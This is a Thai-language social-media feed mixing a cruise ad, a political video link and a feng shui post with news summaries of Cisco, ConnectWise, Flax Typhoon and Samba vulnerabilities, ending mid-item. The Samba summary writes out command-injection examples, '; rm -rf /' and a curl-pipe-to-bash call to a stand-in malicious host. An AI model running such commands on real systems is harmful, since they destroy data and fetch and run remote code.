• 🛳 แพ็คเกจล่องเรือสำราญ Star Voyager, Cruise Only 3 วัน 2 คืน

    เส้นทาง ฮ่องกง - เซี่ยเหมิน - ฮ่องกง

    วันที่ 24-26 ต.ค. 68 // 31 ต.ค.-2 พ.ย. 68 // 7-9 พ.ย. 68

    ราคาเริ่มต้น : ฿5,800

    ✔ ห้องพักบนเรือสำราญ
    ✔ อาหารทุกมื้อบนเรือ
    ✔ กิจกรรมและความบัรเทิงบนเรือสำราญ

    รหัสแพคเกจทัวร์ : STCP-3D2N-HKG-HKG-2511071
    คลิกดูรายละเอียดโปรแกรม : 78s.me/e27183

    ดูเรือ Star Cruise ทั้งหมดได้ที่
    https://78s.me/e20770

    ดูแพ็คเกจเรือทั้งหมด
    https://cruisedomain.com/
    LINE ID: @CruiseDomain 78s.me/c54029
    Facebook: CruiseDomain 78s.me/b8a121
    Youtube : CruiseDomain 78s.me/8af620
    : 0 2116 9696

    #เรือStarCruise #StarVoyager #Starcruise #ResortsWorldOne #Asia #Hongkong #China #แพ็คเกจล่องเรือสำราญ #CruiseDomain
    🛳 แพ็คเกจล่องเรือสำราญ Star Voyager, Cruise Only 3 วัน 2 คืน 🏁 เส้นทาง ฮ่องกง - เซี่ยเหมิน - ฮ่องกง 📅 วันที่ 24-26 ต.ค. 68 // 31 ต.ค.-2 พ.ย. 68 // 7-9 พ.ย. 68 💥 ราคาเริ่มต้น : ฿5,800 ✔ ห้องพักบนเรือสำราญ ✔ อาหารทุกมื้อบนเรือ ✔ กิจกรรมและความบัรเทิงบนเรือสำราญ ➡️ รหัสแพคเกจทัวร์ : STCP-3D2N-HKG-HKG-2511071 คลิกดูรายละเอียดโปรแกรม : 78s.me/e27183 ดูเรือ Star Cruise ทั้งหมดได้ที่ https://78s.me/e20770 ✅ ดูแพ็คเกจเรือทั้งหมด https://cruisedomain.com/ LINE ID: @CruiseDomain 78s.me/c54029 Facebook: CruiseDomain 78s.me/b8a121 Youtube : CruiseDomain 78s.me/8af620 ☎️: 0 2116 9696 #เรือStarCruise #StarVoyager #Starcruise #ResortsWorldOne #Asia #Hongkong #China #แพ็คเกจล่องเรือสำราญ #CruiseDomain
    0 ความคิดเห็น 0 การแบ่งปัน 48 มุมมอง 0 รีวิว
  • MOU43-44 END GAME Ep315(live)

    SONDHITALK : ผู้เฒ่าเล่าเรื่อง Ep315 (live)
    มหากาพย์ MOU43-44 จุดเริ่มต้นของการเสียดินแดนไทย ใครเป็นคนเริ่ม ใครได้-ใครเสีย ต้องติดตาม

    สมัครสมาชิก membership ความจริงมีหนึ่งเดียว ช่อง SONDHITALK บน YouTube : https://www.youtube.com/@sondhitalk/join
    • ติดต่อสอบถามได้ที่ Line : @sondhitalk

    คลิก https://www.youtube.com/watch?v=l1-898FrpWw
    0 ความคิดเห็น 0 การแบ่งปัน 6 มุมมอง 0 รีวิว
  • “Operation Zero Disco” — ช่องโหว่ SNMP ของ Cisco ถูกใช้ฝัง rootkit บนสวิตช์ Linux

    นักวิจัยจาก Trend Research เปิดเผยแคมเปญการโจมตีไซเบอร์ขั้นสูงชื่อ “Operation Zero Disco” ซึ่งใช้ช่องโหว่ CVE-2025-20352 ในบริการ SNMP ของ Cisco เพื่อฝัง rootkit บนสวิตช์ที่ใช้ Linux โดยเฉพาะรุ่น 9400, 9300 และ 3750G ที่ไม่มีระบบป้องกันแบบ EDR

    เมื่อโจมตีสำเร็จ ผู้ไม่หวังดีสามารถ:

    เข้าถึงระบบจากระยะไกล (RCE)
    ตั้งรหัสผ่าน universal ที่มีคำว่า “disco”
    ฝัง hook เข้าไปในหน่วยความจำ IOSd เพื่อหลบเลี่ยงการตรวจจับ
    รับคำสั่งลับผ่าน UDP แม้พอร์ตจะปิดอยู่
    ซ่อนบัญชีผู้ใช้, ACL และสคริปต์ EEM จาก config
    ลบหรือแก้ไข log เพื่อปกปิดร่องรอยการโจมตี
    ข้ามข้อจำกัด VTY access สำหรับ Telnet และ SSH

    แฮกเกอร์เริ่มจากการใช้ community string “public” ของ SNMP เพื่อเข้าถึง core switch จากนั้นปลอมตัวเป็นอุปกรณ์ภายในที่เชื่อถือได้เพื่อข้าม firewall และใช้ ARP spoofing เพื่อควบคุมการสื่อสารในเครือข่าย

    นอกจากนี้ยังพบว่ามีการใช้ช่องโหว่ Telnet เก่า CVE-2017-3881 ที่ถูกดัดแปลงให้สามารถอ่าน/เขียนหน่วยความจำโดยตรง

    Cisco ได้ออกคำแนะนำด้านความปลอดภัยให้:
    ปิด SNMP หากไม่จำเป็น
    เปลี่ยน community string จากค่าเริ่มต้น
    อัปเดต firmware ทันที

    จุดเด่นจากรายงาน
    ช่องโหว่ CVE-2025-20352 ถูกใช้โจมตีสวิตช์ Cisco รุ่นเก่า
    rootkit ฝังตัวลึกใน IOSd memory และหลบเลี่ยงการตรวจจับ
    รับคำสั่งผ่าน UDP โดยไม่ต้องเปิดพอร์ต
    ซ่อน config และ log เพื่อปิดบังการบุกรุก
    ใช้ ARP spoofing เพื่อควบคุมการสื่อสารระหว่าง VLAN
    ใช้ช่องโหว่ Telnet เก่าที่ถูกดัดแปลงเพื่อควบคุมหน่วยความจำ
    Cisco แนะนำให้ปิด SNMP และอัปเดตระบบทันที


    https://securityonline.info/operation-zero-disco-critical-cisco-snmp-flaw-cve-2025-20352-used-to-implant-linux-rootkits-on-switches/
    🕵️‍♂️ “Operation Zero Disco” — ช่องโหว่ SNMP ของ Cisco ถูกใช้ฝัง rootkit บนสวิตช์ Linux นักวิจัยจาก Trend Research เปิดเผยแคมเปญการโจมตีไซเบอร์ขั้นสูงชื่อ “Operation Zero Disco” ซึ่งใช้ช่องโหว่ CVE-2025-20352 ในบริการ SNMP ของ Cisco เพื่อฝัง rootkit บนสวิตช์ที่ใช้ Linux โดยเฉพาะรุ่น 9400, 9300 และ 3750G ที่ไม่มีระบบป้องกันแบบ EDR เมื่อโจมตีสำเร็จ ผู้ไม่หวังดีสามารถ: 🪲 เข้าถึงระบบจากระยะไกล (RCE) 🪲 ตั้งรหัสผ่าน universal ที่มีคำว่า “disco” 🪲 ฝัง hook เข้าไปในหน่วยความจำ IOSd เพื่อหลบเลี่ยงการตรวจจับ 🪲 รับคำสั่งลับผ่าน UDP แม้พอร์ตจะปิดอยู่ 🪲 ซ่อนบัญชีผู้ใช้, ACL และสคริปต์ EEM จาก config 🪲 ลบหรือแก้ไข log เพื่อปกปิดร่องรอยการโจมตี 🪲 ข้ามข้อจำกัด VTY access สำหรับ Telnet และ SSH แฮกเกอร์เริ่มจากการใช้ community string “public” ของ SNMP เพื่อเข้าถึง core switch จากนั้นปลอมตัวเป็นอุปกรณ์ภายในที่เชื่อถือได้เพื่อข้าม firewall และใช้ ARP spoofing เพื่อควบคุมการสื่อสารในเครือข่าย นอกจากนี้ยังพบว่ามีการใช้ช่องโหว่ Telnet เก่า CVE-2017-3881 ที่ถูกดัดแปลงให้สามารถอ่าน/เขียนหน่วยความจำโดยตรง Cisco ได้ออกคำแนะนำด้านความปลอดภัยให้: 🚑 ปิด SNMP หากไม่จำเป็น 🚑 เปลี่ยน community string จากค่าเริ่มต้น 🚑 อัปเดต firmware ทันที ✅ จุดเด่นจากรายงาน ➡️ ช่องโหว่ CVE-2025-20352 ถูกใช้โจมตีสวิตช์ Cisco รุ่นเก่า ➡️ rootkit ฝังตัวลึกใน IOSd memory และหลบเลี่ยงการตรวจจับ ➡️ รับคำสั่งผ่าน UDP โดยไม่ต้องเปิดพอร์ต ➡️ ซ่อน config และ log เพื่อปิดบังการบุกรุก ➡️ ใช้ ARP spoofing เพื่อควบคุมการสื่อสารระหว่าง VLAN ➡️ ใช้ช่องโหว่ Telnet เก่าที่ถูกดัดแปลงเพื่อควบคุมหน่วยความจำ ➡️ Cisco แนะนำให้ปิด SNMP และอัปเดตระบบทันที https://securityonline.info/operation-zero-disco-critical-cisco-snmp-flaw-cve-2025-20352-used-to-implant-linux-rootkits-on-switches/
    SECURITYONLINE.INFO
    Operation Zero Disco: Critical Cisco SNMP Flaw (CVE-2025-20352) Used to Implant Linux Rootkits on Switches
    "Operation Zero Disco" exploits a critical Cisco SNMP flaw (CVE-2025-20352) to deploy Linux rootkits on switches. The malware sets a universal "disco" password and hides configuration to maintain persistence.
    0 ความคิดเห็น 0 การแบ่งปัน 54 มุมมอง 0 รีวิว
  • ก็เพราะแบบนี้ไง รัฐบาล เป็นมาแล้วเป็นไป
    "ระบบอุปถัมภ์"
    (ผมมีวันนี้เพราะพี่ให้ ให้มาถ้าไม่รับไว้ก็จะเสียน้ำใจกัน)
    ก็เพราะแบบนี้ไง รัฐบาล เป็นมาแล้วเป็นไป "ระบบอุปถัมภ์" (ผมมีวันนี้เพราะพี่ให้ ให้มาถ้าไม่รับไว้ก็จะเสียน้ำใจกัน)
    0 ความคิดเห็น 0 การแบ่งปัน 14 มุมมอง 0 รีวิว
  • “Cisco อุดช่องโหว่ CVE-2025-20350 บน IP Phone” — ป้องกันการรีโหลดเครื่องจากการโจมตี DoS ผ่าน HTTP

    Cisco ได้ออกแพตช์เพื่อแก้ไขช่องโหว่ความรุนแรงสูง CVE-2025-20350 ซึ่งส่งผลกระทบต่ออุปกรณ์ Cisco Desk Phone และ IP Phone หลายรุ่น เช่น 9800, 7800, 8800 และ 8875 ที่ใช้ Cisco SIP Software โดยช่องโหว่นี้เปิดทางให้ผู้โจมตีที่ไม่ได้รับการยืนยันตัวตนสามารถส่งข้อมูล HTTP ที่ถูกปรับแต่งมาอย่างเจาะจงเพื่อทำให้เครื่องรีโหลดและเกิดภาวะ Denial-of-Service (DoS)

    ช่องโหว่นี้เกิดจาก buffer overflow ใน web interface ของอุปกรณ์ ซึ่งจะทำงานได้ก็ต่อเมื่อเปิดใช้งาน Web Access และอุปกรณ์ได้ลงทะเบียนกับ Cisco Unified Communications Manager แล้ว โดยปกติ Web Access จะถูกปิดไว้เป็นค่าเริ่มต้น ทำให้ลดความเสี่ยงในระบบที่ไม่ได้เปิดใช้งานฟีเจอร์นี้

    Cisco ยังเปิดเผยช่องโหว่อีกตัวคือ CVE-2025-20351 ซึ่งมีความรุนแรงระดับกลาง (CVSS 6.1) ที่เกี่ยวข้องกับการตรวจสอบ input ไม่เพียงพอใน web UI ทำให้ผู้โจมตีสามารถหลอกให้ผู้ใช้คลิกลิงก์ที่ถูกปรับแต่งเพื่อรัน JavaScript ในบริบทของเบราว์เซอร์

    ไม่มีวิธีแก้ไขชั่วคราวสำหรับช่องโหว่ทั้งสองนอกจากการปิด Web Access หรืออัปเดต firmware เป็นเวอร์ชันที่ปลอดภัย

    ข้อมูลในข่าว
    Cisco แก้ไขช่องโหว่ CVE-2025-20350 ที่ทำให้เกิด DoS บนอุปกรณ์ IP Phone
    ช่องโหว่เกิดจาก buffer overflow เมื่อประมวลผล HTTP input
    ต้องเปิด Web Access และลงทะเบียนกับ Cisco Unified Communications Manager เพื่อให้ช่องโหว่ทำงาน
    Web Access ถูกปิดเป็นค่าเริ่มต้น ลดความเสี่ยงในระบบทั่วไป
    ไม่มี workaround นอกจากการอัปเดต firmware หรือปิด Web Access
    ช่องโหว่ CVE-2025-20351 เปิดทางให้โจมตีแบบ XSS ผ่าน web UI
    อุปกรณ์ที่ได้รับผลกระทบ ได้แก่ Cisco Desk Phone 9800, IP Phone 7800, 8800, 8821 และ Video Phone 8875
    เวอร์ชันที่ปลอดภัย ได้แก่ SIP Software 3.3(1), 14.3(1)SR2, 14.4(1), และ 11.0(6)SR7


    https://securityonline.info/cisco-patches-high-severity-cve-2025-20350-dos-flaw-in-desk-and-ip-phones/
    📞 “Cisco อุดช่องโหว่ CVE-2025-20350 บน IP Phone” — ป้องกันการรีโหลดเครื่องจากการโจมตี DoS ผ่าน HTTP Cisco ได้ออกแพตช์เพื่อแก้ไขช่องโหว่ความรุนแรงสูง CVE-2025-20350 ซึ่งส่งผลกระทบต่ออุปกรณ์ Cisco Desk Phone และ IP Phone หลายรุ่น เช่น 9800, 7800, 8800 และ 8875 ที่ใช้ Cisco SIP Software โดยช่องโหว่นี้เปิดทางให้ผู้โจมตีที่ไม่ได้รับการยืนยันตัวตนสามารถส่งข้อมูล HTTP ที่ถูกปรับแต่งมาอย่างเจาะจงเพื่อทำให้เครื่องรีโหลดและเกิดภาวะ Denial-of-Service (DoS) ช่องโหว่นี้เกิดจาก buffer overflow ใน web interface ของอุปกรณ์ ซึ่งจะทำงานได้ก็ต่อเมื่อเปิดใช้งาน Web Access และอุปกรณ์ได้ลงทะเบียนกับ Cisco Unified Communications Manager แล้ว โดยปกติ Web Access จะถูกปิดไว้เป็นค่าเริ่มต้น ทำให้ลดความเสี่ยงในระบบที่ไม่ได้เปิดใช้งานฟีเจอร์นี้ Cisco ยังเปิดเผยช่องโหว่อีกตัวคือ CVE-2025-20351 ซึ่งมีความรุนแรงระดับกลาง (CVSS 6.1) ที่เกี่ยวข้องกับการตรวจสอบ input ไม่เพียงพอใน web UI ทำให้ผู้โจมตีสามารถหลอกให้ผู้ใช้คลิกลิงก์ที่ถูกปรับแต่งเพื่อรัน JavaScript ในบริบทของเบราว์เซอร์ ไม่มีวิธีแก้ไขชั่วคราวสำหรับช่องโหว่ทั้งสองนอกจากการปิด Web Access หรืออัปเดต firmware เป็นเวอร์ชันที่ปลอดภัย ✅ ข้อมูลในข่าว ➡️ Cisco แก้ไขช่องโหว่ CVE-2025-20350 ที่ทำให้เกิด DoS บนอุปกรณ์ IP Phone ➡️ ช่องโหว่เกิดจาก buffer overflow เมื่อประมวลผล HTTP input ➡️ ต้องเปิด Web Access และลงทะเบียนกับ Cisco Unified Communications Manager เพื่อให้ช่องโหว่ทำงาน ➡️ Web Access ถูกปิดเป็นค่าเริ่มต้น ลดความเสี่ยงในระบบทั่วไป ➡️ ไม่มี workaround นอกจากการอัปเดต firmware หรือปิด Web Access ➡️ ช่องโหว่ CVE-2025-20351 เปิดทางให้โจมตีแบบ XSS ผ่าน web UI ➡️ อุปกรณ์ที่ได้รับผลกระทบ ได้แก่ Cisco Desk Phone 9800, IP Phone 7800, 8800, 8821 และ Video Phone 8875 ➡️ เวอร์ชันที่ปลอดภัย ได้แก่ SIP Software 3.3(1), 14.3(1)SR2, 14.4(1), และ 11.0(6)SR7 https://securityonline.info/cisco-patches-high-severity-cve-2025-20350-dos-flaw-in-desk-and-ip-phones/
    SECURITYONLINE.INFO
    Cisco Patches High-Severity CVE-2025-20350 DoS Flaw in Desk and IP Phones
    Cisco released updates for its Desk and IP Phone series, fixing a High-severity DoS flaw (CVE-2025-20350) from buffer overflow and a Medium XSS flaw (CVE-2025-20351).
    0 ความคิดเห็น 0 การแบ่งปัน 38 มุมมอง 0 รีวิว
  • FENGSHUI DAILY
    อัพเดตทุกวัน ที่นี่ที่เดียว
    สีเสริมดวง เสริมความเฮง
    ทิศมงคล เวลามงคล
    อย่าลืมดูกัน เมื่อเริ่มวันใหม่
    วันเสาร์ที่ 18 เดือนตุลาคม พ.ศ.2568
    ___________________________________
    FengshuiBizDesigner
    ฮวงจุ้ย...ออกแบบได้
    FENGSHUI DAILY อัพเดตทุกวัน ที่นี่ที่เดียว สีเสริมดวง เสริมความเฮง ทิศมงคล เวลามงคล อย่าลืมดูกัน เมื่อเริ่มวันใหม่ วันเสาร์ที่ 18 เดือนตุลาคม พ.ศ.2568 ___________________________________ FengshuiBizDesigner ฮวงจุ้ย...ออกแบบได้
    0 ความคิดเห็น 0 การแบ่งปัน 22 มุมมอง 0 รีวิว
  • “ช่องโหว่ CVE-2025-11492 บน ConnectWise Automate” — เสี่ยงถูกโจมตีแบบ Man-in-the-Middle หากใช้ HTTP แทน HTTPS

    ConnectWise ได้ออกแพตช์ฉุกเฉินสำหรับช่องโหว่ร้ายแรง CVE-2025-11492 ซึ่งมีคะแนน CVSS สูงถึง 9.6 โดยช่องโหว่นี้เกิดจากการตั้งค่าที่อนุญาตให้ Agent ของระบบ Automate ใช้การสื่อสารผ่าน HTTP แทน HTTPS ซึ่งเปิดช่องให้ผู้โจมตีที่อยู่ในตำแหน่งเครือข่ายแบบ Man-in-the-Middle (MitM) สามารถดักฟัง แก้ไข หรือส่งคำสั่งปลอมไปยังเซิร์ฟเวอร์ได้

    ช่องโหว่นี้มีผลกระทบสูงมาก เพราะ ConnectWise Automate เป็นระบบ RMM (Remote Monitoring and Management) ที่มีสิทธิ์เข้าถึงระดับผู้ดูแลระบบในเครื่องลูกข่ายจำนวนมาก หากถูกโจมตีสำเร็จ อาจนำไปสู่การติดตั้งมัลแวร์หรือการควบคุมระบบจากระยะไกล

    แพตช์เวอร์ชัน 2025.9 ได้แก้ไขโดยบังคับให้ Agent ทุกตัวใช้ HTTPS เท่านั้น และแนะนำให้ผู้ใช้ที่ติดตั้งแบบ on-premise เปิดใช้ TLS 1.2 เพื่อเพิ่มความปลอดภัยในการสื่อสาร

    นอกจากนี้ยังมีช่องโหว่ CVE-2025-11493 (CVSS 8.8) ที่เกี่ยวข้องกับการตรวจสอบไฟล์อัปเดตไม่เพียงพอ ซึ่งอาจทำให้ผู้โจมตีแทรกไฟล์ปลอมระหว่างการอัปเดต Agent ได้ โดยช่องโหว่นี้จะถูกปิดเมื่อมีการบังคับใช้ HTTPS เช่นกัน

    ข้อมูลในข่าว
    ช่องโหว่ CVE-2025-11492 มีคะแนน CVSS 9.6 เกิดจากการใช้ HTTP แทน HTTPS
    เสี่ยงถูกโจมตีแบบ Man-in-the-Middle หากอยู่ในเครือข่ายเดียวกัน
    ConnectWise Automate เป็นระบบ RMM ที่มีสิทธิ์ระดับสูงในเครื่องลูกข่าย
    แพตช์เวอร์ชัน 2025.9 บังคับใช้ HTTPS สำหรับ Agent ทุกตัว
    แนะนำให้เปิดใช้ TLS 1.2 สำหรับเซิร์ฟเวอร์แบบ on-premise
    ช่องโหว่ CVE-2025-11493 เกี่ยวข้องกับการตรวจสอบไฟล์อัปเดตไม่เพียงพอ
    การบังคับใช้ HTTPS ช่วยปิดช่องโหว่ทั้งสองตัว
    ระบบ cloud-hosted ของ ConnectWise ได้รับการอัปเดตแล้ว
    ผู้ใช้แบบ on-premise ต้องอัปเดตด้วยตนเองเพื่อป้องกันความเสี่ยง

    https://securityonline.info/critical-connectwise-automate-flaw-cve-2025-11492-cvss-9-6-allows-rmm-agent-man-in-the-middle-attack/
    🔐 “ช่องโหว่ CVE-2025-11492 บน ConnectWise Automate” — เสี่ยงถูกโจมตีแบบ Man-in-the-Middle หากใช้ HTTP แทน HTTPS ConnectWise ได้ออกแพตช์ฉุกเฉินสำหรับช่องโหว่ร้ายแรง CVE-2025-11492 ซึ่งมีคะแนน CVSS สูงถึง 9.6 โดยช่องโหว่นี้เกิดจากการตั้งค่าที่อนุญาตให้ Agent ของระบบ Automate ใช้การสื่อสารผ่าน HTTP แทน HTTPS ซึ่งเปิดช่องให้ผู้โจมตีที่อยู่ในตำแหน่งเครือข่ายแบบ Man-in-the-Middle (MitM) สามารถดักฟัง แก้ไข หรือส่งคำสั่งปลอมไปยังเซิร์ฟเวอร์ได้ ช่องโหว่นี้มีผลกระทบสูงมาก เพราะ ConnectWise Automate เป็นระบบ RMM (Remote Monitoring and Management) ที่มีสิทธิ์เข้าถึงระดับผู้ดูแลระบบในเครื่องลูกข่ายจำนวนมาก หากถูกโจมตีสำเร็จ อาจนำไปสู่การติดตั้งมัลแวร์หรือการควบคุมระบบจากระยะไกล แพตช์เวอร์ชัน 2025.9 ได้แก้ไขโดยบังคับให้ Agent ทุกตัวใช้ HTTPS เท่านั้น และแนะนำให้ผู้ใช้ที่ติดตั้งแบบ on-premise เปิดใช้ TLS 1.2 เพื่อเพิ่มความปลอดภัยในการสื่อสาร นอกจากนี้ยังมีช่องโหว่ CVE-2025-11493 (CVSS 8.8) ที่เกี่ยวข้องกับการตรวจสอบไฟล์อัปเดตไม่เพียงพอ ซึ่งอาจทำให้ผู้โจมตีแทรกไฟล์ปลอมระหว่างการอัปเดต Agent ได้ โดยช่องโหว่นี้จะถูกปิดเมื่อมีการบังคับใช้ HTTPS เช่นกัน ✅ ข้อมูลในข่าว ➡️ ช่องโหว่ CVE-2025-11492 มีคะแนน CVSS 9.6 เกิดจากการใช้ HTTP แทน HTTPS ➡️ เสี่ยงถูกโจมตีแบบ Man-in-the-Middle หากอยู่ในเครือข่ายเดียวกัน ➡️ ConnectWise Automate เป็นระบบ RMM ที่มีสิทธิ์ระดับสูงในเครื่องลูกข่าย ➡️ แพตช์เวอร์ชัน 2025.9 บังคับใช้ HTTPS สำหรับ Agent ทุกตัว ➡️ แนะนำให้เปิดใช้ TLS 1.2 สำหรับเซิร์ฟเวอร์แบบ on-premise ➡️ ช่องโหว่ CVE-2025-11493 เกี่ยวข้องกับการตรวจสอบไฟล์อัปเดตไม่เพียงพอ ➡️ การบังคับใช้ HTTPS ช่วยปิดช่องโหว่ทั้งสองตัว ➡️ ระบบ cloud-hosted ของ ConnectWise ได้รับการอัปเดตแล้ว ➡️ ผู้ใช้แบบ on-premise ต้องอัปเดตด้วยตนเองเพื่อป้องกันความเสี่ยง https://securityonline.info/critical-connectwise-automate-flaw-cve-2025-11492-cvss-9-6-allows-rmm-agent-man-in-the-middle-attack/
    SECURITYONLINE.INFO
    Critical ConnectWise Automate Flaw (CVE-2025-11492, CVSS 9.6) Allows RMM Agent Man-in-the-Middle Attack
    ConnectWise patched two high-severity flaws in Automate RMM. CVE-2025-11492 (CVSS 9.6) allows MiTM attack to intercept unencrypted agent communications and inject malicious updates. Update to 2025.9.
    0 ความคิดเห็น 0 การแบ่งปัน 46 มุมมอง 0 รีวิว
  • “Flax Typhoon ฝัง Web Shell ใน ArcGIS SOE” — แฮกเกอร์จีนเข้าถึงระบบนานกว่า 1 ปีโดยใช้ซอฟต์แวร์ที่เชื่อถือได้เป็นช่องทางลับ

    กลุ่มแฮกเกอร์ที่ได้รับการสนับสนุนจากรัฐบาลจีนชื่อ “Flax Typhoon” หรือ “Ethereal Panda” ถูกเปิดโปงว่าใช้เทคนิคใหม่ในการแทรกซึมระบบองค์กรผ่าน ArcGIS โดยเปลี่ยน Java Server Object Extension (SOE) ที่ถูกต้องตามมาตรฐานให้กลายเป็น Web Shell แบบลับ ซึ่งสามารถควบคุมระบบได้โดยไม่ถูกตรวจจับ

    การโจมตีนี้กินเวลานานกว่า 12 เดือน โดยแฮกเกอร์ฝัง SOE ที่มี access key แบบ hardcoded ลงในระบบ และฝังไว้ในไฟล์ backup เพื่อให้กลับมาได้แม้ระบบจะถูกกู้คืนแล้วก็ตาม

    หลังจากเข้าถึงระบบผ่านบัญชีผู้ดูแล ArcGIS ที่ถูกขโมย พวกเขาใช้คำสั่ง base64 ที่ดูเหมือนคำสั่งปกติของ ArcGIS เพื่อหลบเลี่ยงการตรวจสอบ และใช้ API ของ ArcGIS ในการรันคำสั่ง PowerShell สร้าง VPN bridge ลับผ่านไฟล์ “bridge.exe” ที่ถูกแปลงชื่อจาก SoftEther VPN

    สุดท้าย Flax Typhoon พยายามเข้าถึง workstation ของ IT เพื่อขโมยข้อมูลจาก SAM และ LSA โดยใช้ RemoteRegistry และสร้างไฟล์ pass.txt.lnk เพื่อเก็บรหัสผ่าน

    ReliaQuest ซึ่งเป็นผู้เปิดเผยการโจมตีนี้ ระบุว่า Flax Typhoon มีแนวโน้มจะยังคงแฝงตัวอยู่ในเครือข่ายอื่น ๆ และมักทำงานในช่วงเวลาตรงกับเวลาทำการของจีน (00:00–06:00 UTC)

    ข้อมูลในข่าว
    Flax Typhoon เป็นกลุ่ม APT ที่ได้รับการสนับสนุนจากรัฐบาลจีน
    ใช้ ArcGIS SOE ที่ถูกต้องตามมาตรฐานแปลงเป็น Web Shell
    Web Shell มี access key แบบ hardcoded และฝังใน backup เพื่อความคงอยู่
    เข้าถึงระบบผ่านบัญชีผู้ดูแล ArcGIS ที่ถูกขโมย
    ใช้คำสั่ง base64 ผ่าน API เพื่อหลบเลี่ยงการตรวจจับ
    สร้าง VPN bridge ลับผ่านไฟล์ bridge.exe ที่แปลงชื่อจาก SoftEther VPN
    พยายามเข้าถึง workstation ของ IT เพื่อขโมย SAM และ LSA secrets
    สร้างไฟล์ pass.txt.lnk เพื่อเก็บรหัสผ่าน
    ReliaQuest ระบุว่า Flax Typhoon มีแนวโน้มยังแฝงตัวในเครือข่ายอื่น
    เวลาทำงานของกลุ่มตรงกับเวลาทำการของจีน (00:00–06:00 UTC)

    https://securityonline.info/china-backed-flax-typhoon-apt-maintained-year-long-access-by-turning-arcgis-soe-into-web-shell-backdoor/
    🌪️ “Flax Typhoon ฝัง Web Shell ใน ArcGIS SOE” — แฮกเกอร์จีนเข้าถึงระบบนานกว่า 1 ปีโดยใช้ซอฟต์แวร์ที่เชื่อถือได้เป็นช่องทางลับ กลุ่มแฮกเกอร์ที่ได้รับการสนับสนุนจากรัฐบาลจีนชื่อ “Flax Typhoon” หรือ “Ethereal Panda” ถูกเปิดโปงว่าใช้เทคนิคใหม่ในการแทรกซึมระบบองค์กรผ่าน ArcGIS โดยเปลี่ยน Java Server Object Extension (SOE) ที่ถูกต้องตามมาตรฐานให้กลายเป็น Web Shell แบบลับ ซึ่งสามารถควบคุมระบบได้โดยไม่ถูกตรวจจับ การโจมตีนี้กินเวลานานกว่า 12 เดือน โดยแฮกเกอร์ฝัง SOE ที่มี access key แบบ hardcoded ลงในระบบ และฝังไว้ในไฟล์ backup เพื่อให้กลับมาได้แม้ระบบจะถูกกู้คืนแล้วก็ตาม หลังจากเข้าถึงระบบผ่านบัญชีผู้ดูแล ArcGIS ที่ถูกขโมย พวกเขาใช้คำสั่ง base64 ที่ดูเหมือนคำสั่งปกติของ ArcGIS เพื่อหลบเลี่ยงการตรวจสอบ และใช้ API ของ ArcGIS ในการรันคำสั่ง PowerShell สร้าง VPN bridge ลับผ่านไฟล์ “bridge.exe” ที่ถูกแปลงชื่อจาก SoftEther VPN สุดท้าย Flax Typhoon พยายามเข้าถึง workstation ของ IT เพื่อขโมยข้อมูลจาก SAM และ LSA โดยใช้ RemoteRegistry และสร้างไฟล์ pass.txt.lnk เพื่อเก็บรหัสผ่าน ReliaQuest ซึ่งเป็นผู้เปิดเผยการโจมตีนี้ ระบุว่า Flax Typhoon มีแนวโน้มจะยังคงแฝงตัวอยู่ในเครือข่ายอื่น ๆ และมักทำงานในช่วงเวลาตรงกับเวลาทำการของจีน (00:00–06:00 UTC) ✅ ข้อมูลในข่าว ➡️ Flax Typhoon เป็นกลุ่ม APT ที่ได้รับการสนับสนุนจากรัฐบาลจีน ➡️ ใช้ ArcGIS SOE ที่ถูกต้องตามมาตรฐานแปลงเป็น Web Shell ➡️ Web Shell มี access key แบบ hardcoded และฝังใน backup เพื่อความคงอยู่ ➡️ เข้าถึงระบบผ่านบัญชีผู้ดูแล ArcGIS ที่ถูกขโมย ➡️ ใช้คำสั่ง base64 ผ่าน API เพื่อหลบเลี่ยงการตรวจจับ ➡️ สร้าง VPN bridge ลับผ่านไฟล์ bridge.exe ที่แปลงชื่อจาก SoftEther VPN ➡️ พยายามเข้าถึง workstation ของ IT เพื่อขโมย SAM และ LSA secrets ➡️ สร้างไฟล์ pass.txt.lnk เพื่อเก็บรหัสผ่าน ➡️ ReliaQuest ระบุว่า Flax Typhoon มีแนวโน้มยังแฝงตัวในเครือข่ายอื่น ➡️ เวลาทำงานของกลุ่มตรงกับเวลาทำการของจีน (00:00–06:00 UTC) https://securityonline.info/china-backed-flax-typhoon-apt-maintained-year-long-access-by-turning-arcgis-soe-into-web-shell-backdoor/
    SECURITYONLINE.INFO
    China-Backed Flax Typhoon APT Maintained Year-Long Access by Turning ArcGIS SOE into Web Shell Backdoor
    ReliaQuest exposed Flax Typhoon for a year-long breach, where the China-backed APT turned a legitimate ArcGIS Java SOE into a web shell and embedded it in backups to ensure persistence.
    0 ความคิดเห็น 0 การแบ่งปัน 54 มุมมอง 0 รีวิว
  • “ช่องโหว่ CVE-2025-10230 บน Samba AD DC” — เสี่ยงถูกสั่งรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน

    ทีมพัฒนา Samba ได้ออกประกาศเตือนภัยร้ายแรงเกี่ยวกับช่องโหว่ CVE-2025-10230 ซึ่งมีคะแนน CVSS เต็ม 10.0 โดยช่องโหว่นี้เปิดทางให้ผู้โจมตีสามารถสั่งรันคำสั่งบนระบบปฏิบัติการได้จากระยะไกลโดยไม่ต้องยืนยันตัวตน หากระบบนั้นเปิดใช้งาน WINS server และมีการตั้งค่า “wins hook” ในไฟล์ smb.conf

    ช่องโหว่นี้เกิดจากการที่ Samba ไม่ได้ตรวจสอบข้อมูลที่ส่งเข้ามาอย่างเพียงพอ เมื่อมีการลงทะเบียนหรือเปลี่ยนชื่อ NetBIOS ผ่าน WINS server ระบบจะเรียกใช้โปรแกรมที่กำหนดไว้ใน “wins hook” โดยนำข้อมูลที่ผู้ใช้ส่งมาไปใส่ในคำสั่ง shell โดยตรง ซึ่งเปิดช่องให้แฮกเกอร์แทรกคำสั่งอันตราย เช่น ; rm -rf / หรือ | curl malicious.site | bash

    เนื่องจาก WINS เป็นโปรโตคอลเก่าที่เชื่อถือข้อมูลจาก client โดยไม่ตรวจสอบอย่างเข้มงวด ผู้โจมตีสามารถส่งชื่อ NetBIOS ที่มีความยาวไม่เกิน 15 ตัวอักษรและแฝงตัวอักขระ shell เพื่อรันคำสั่งบนเครื่องเป้าหมายได้ทันที

    ช่องโหว่นี้มีผลเฉพาะกับ Samba ที่ทำหน้าที่เป็น Active Directory Domain Controller และเปิดใช้งาน WINS พร้อมตั้งค่า “wins hook” เท่านั้น ส่วน Samba ที่เป็น member server หรือ standalone host จะไม่ได้รับผลกระทบ

    ทีม Samba แนะนำให้ผู้ดูแลระบบ:
